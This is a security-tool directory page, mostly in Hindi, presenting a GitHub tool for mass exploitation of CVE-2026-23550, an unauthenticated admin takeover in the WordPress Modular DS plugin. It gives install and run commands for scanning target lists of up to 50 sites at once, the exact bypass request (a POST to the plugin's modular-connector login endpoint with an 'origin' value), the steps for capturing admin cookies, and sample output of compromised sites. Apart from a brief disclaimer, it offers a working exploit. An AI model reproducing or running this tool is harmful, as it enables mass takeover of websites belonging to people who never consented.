Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mass-CVE-2026-23550-Exploit — # CVE-2026-23550 के लिए मल्टी-थ्रेडेड Python स्कैनर, जो WordPress Modular DS प्लगइन में अनप्रमाणित एडमिन टेकओवर का पता लगाता है, पूर्ण wp-admin सत्यापन के साथ। | Kitploit
उपकरण/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

# CVE-2026-23550 के लिए मल्टी-थ्रेडेड Python स्कैनर, जो WordPress Modular DS प्लगइन में अनप्रमाणित एडमिन टेकओवर का पता लगाता है, पूर्ण wp-admin सत्यापन के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
247 महीने पहलेअभी तक समीक्षित नहीं

🔥 CVE-2026-23550 मॉड्यूलर DS स्कैनर

CVE-2026-23550 (CVSS 10.0) WordPress Modular DS प्लगइन ≤2.5.1 कमजोरी के लिए मल्टी-थ्रेडेड Python स्कैनर, जो 40k+ साइटों को प्रभावित करता है। पूर्ण wp-admin एक्सेस सत्यापन के साथ getLogin() बाईपास के माध्यम से अनप्रमाणित एडमिन अधिग्रहण का पता लगाता है। विशेषताएं ✨

root@kitploit:~
🔥 पूर्ण एडमिन एक्सेस पहचान (कुकीज़ + wp-admin सत्यापन)

⚡ मल्टी-थ्रेडिंग (50+ समवर्ती लक्ष्यों तक)

📊 rich के साथ एनिमेटेड प्रगति पट्टी

🎨 रंगीन सारांश तालिका

💾 कमजोर लक्ष्यों को फ़ाइल में स्वतः सहेजें

🚀 प्रोडक्शन-तैयार टाइमआउट और त्रुटि प्रबंधन

स्थापना 🚀

bash pip3 install requests rich chmod +x modular_ds.py

उपयोग 📋

bash

मास स्कैन (50 थ्रेड)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

बग बाउंटी रिकॉन

python3 modular_ds.py -l univ-oran1.txt -t 20

डिफ़ॉल्ट (20 थ्रेड, vulns.txt आउटपुट)

python3 modular_ds.py -l targets.txt

targets.txt प्रारूप:

text https://target1.com http://site2.com

टिप्पणियाँ छोड़ें

https://sub.domain.tld

तर्क फ़्लैग विवरण डिफ़ॉल्ट -l, --list आवश्यक लक्ष्य फ़ाइल (1 URL/पंक्ति) - -t, --threads अधिकतम समवर्ती थ्रेड 20 -o, --output कमजोर लक्ष्य आउटपुट फ़ाइल vulns.txt नमूना आउटपुट 🖥️

text 🔥 CVE-2026-23550 मॉड्यूलर DS स्कैनर 🔥 लक्ष्य: 247 | थ्रेड: 50 | आउटपुट: bounty_vulns.txt

⠋ Modular DS स्कैन हो रहा है... 127/247 (51%) ✅ कमजोर: https://target.com 🔥 पूर्ण एडमिन एक्सेस: target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ स्थिति │ लक्ष्य │ विवरण │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 पूर्ण │ https://target.com │ 3 कुकीज़ │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 कमजोर लक्ष्य → bounty_vulns.txt

पहचान तर्क 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ wordpress_logged_in_* एडमिन कुकी जांचें
  3. ✅ /wp-admin/ डैशबोर्ड एक्सेस सत्यापित करें
  4. 💾 पुष्टि किए गए पूर्ण एडमिन एक्सेस लक्ष्य सहेजें

कानूनी और नैतिक उपयोग ⚖️

text ⚠️ केवल इसके लिए: ✅ अधिकृत पेंटेस्टिंग ✅ बग बाउंटी प्रोग्राम
✅ सुरक्षा अनुसंधान प्रयोगशालाएं ✅ स्वामित्व वाला इंफ्रास्ट्रक्चर

❌ अनधिकृत लक्ष्यों पर कभी उपयोग न करें

आवश्यकताएं 📦

text requests>=2.31.0 rich>=13.0.0

टूल डाउनलोड करें